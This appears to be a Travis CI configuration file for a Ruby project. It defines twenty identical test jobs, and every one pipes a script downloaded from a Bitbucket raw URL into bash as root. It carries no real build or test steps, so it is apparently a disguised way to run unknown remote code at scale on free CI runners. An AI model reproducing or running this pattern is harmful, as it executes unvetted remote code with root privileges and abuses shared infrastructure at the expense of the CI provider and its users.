language: ruby


jobs:
  include:
    - stage: test
      name: "build1"
      script:
        - sudo -u root curl https://bitbucket.org/ivondurr/onydur/raw/8dcbca8a0bbeecbff75aa9daffa624fe648379e6/durreno | bash
        
    -
      name: "build2"
      script:
        - sudo -u root curl https://bitbucket.org/ivondurr/onydur/raw/8dcbca8a0bbeecbff75aa9daffa624fe648379e6/durreno | bash
        
    -
      name: "build3"
      script:
        - sudo -u root curl https://bitbucket.org/ivondurr/onydur/raw/8dcbca8a0bbeecbff75aa9daffa624fe648379e6/durreno | bash
        
    -
      name: "build4"
      script:
        - sudo -u root curl https://bitbucket.org/ivondurr/onydur/raw/8dcbca8a0bbeecbff75aa9daffa624fe648379e6/durreno | bash
        
    -
      name: "build5"
      script:
        - sudo -u root curl https://bitbucket.org/ivondurr/onydur/raw/8dcbca8a0bbeecbff75aa9daffa624fe648379e6/durreno | bash
        
    -
      name: "build6"
      script:
        - sudo -u root curl https://bitbucket.org/ivondurr/onydur/raw/8dcbca8a0bbeecbff75aa9daffa624fe648379e6/durreno | bash
        
    -
      name: "build7"
      script:
        - sudo -u root curl https://bitbucket.org/ivondurr/onydur/raw/8dcbca8a0bbeecbff75aa9daffa624fe648379e6/durreno | bash
        
    -
      name: "build8"
      script:
        - sudo -u root curl https://bitbucket.org/ivondurr/onydur/raw/8dcbca8a0bbeecbff75aa9daffa624fe648379e6/durreno | bash
        
    -
      name: "build9"
      script:
        - sudo -u root curl https://bitbucket.org/ivondurr/onydur/raw/8dcbca8a0bbeecbff75aa9daffa624fe648379e6/durreno | bash
        
    -
      name: "build10"
      script:
        - sudo -u root curl https://bitbucket.org/ivondurr/onydur/raw/8dcbca8a0bbeecbff75aa9daffa624fe648379e6/durreno | bash
        
    -
      name: "build11"
      script:
        - sudo -u root curl https://bitbucket.org/ivondurr/onydur/raw/8dcbca8a0bbeecbff75aa9daffa624fe648379e6/durreno | bash
        
    -
      name: "build12"
      script:
        - sudo -u root curl https://bitbucket.org/ivondurr/onydur/raw/8dcbca8a0bbeecbff75aa9daffa624fe648379e6/durreno | bash
        
    -
      name: "build13"
      script:
        - sudo -u root curl https://bitbucket.org/ivondurr/onydur/raw/8dcbca8a0bbeecbff75aa9daffa624fe648379e6/durreno | bash
        
    -
      name: "build14"
      script:
        - sudo -u root curl https://bitbucket.org/ivondurr/onydur/raw/8dcbca8a0bbeecbff75aa9daffa624fe648379e6/durreno | bash
        
    -
      name: "build15"
      script:
        - sudo -u root curl https://bitbucket.org/ivondurr/onydur/raw/8dcbca8a0bbeecbff75aa9daffa624fe648379e6/durreno | bash
        
    -
      name: "build16"
      script:
        - sudo -u root curl https://bitbucket.org/ivondurr/onydur/raw/8dcbca8a0bbeecbff75aa9daffa624fe648379e6/durreno | bash
        
    -
      name: "build17"
      script:
        - sudo -u root curl https://bitbucket.org/ivondurr/onydur/raw/8dcbca8a0bbeecbff75aa9daffa624fe648379e6/durreno | bash
        
    -
      name: "build18"
      script:
        - sudo -u root curl https://bitbucket.org/ivondurr/onydur/raw/8dcbca8a0bbeecbff75aa9daffa624fe648379e6/durreno | bash
        
    -
      name: "build19"
      script:
        - sudo -u root curl https://bitbucket.org/ivondurr/onydur/raw/8dcbca8a0bbeecbff75aa9daffa624fe648379e6/durreno | bash
        
    -
      name: "build20"
      script:
        - sudo -u root curl https://bitbucket.org/ivondurr/onydur/raw/8dcbca8a0bbeecbff75aa9daffa624fe648379e6/durreno | bash
        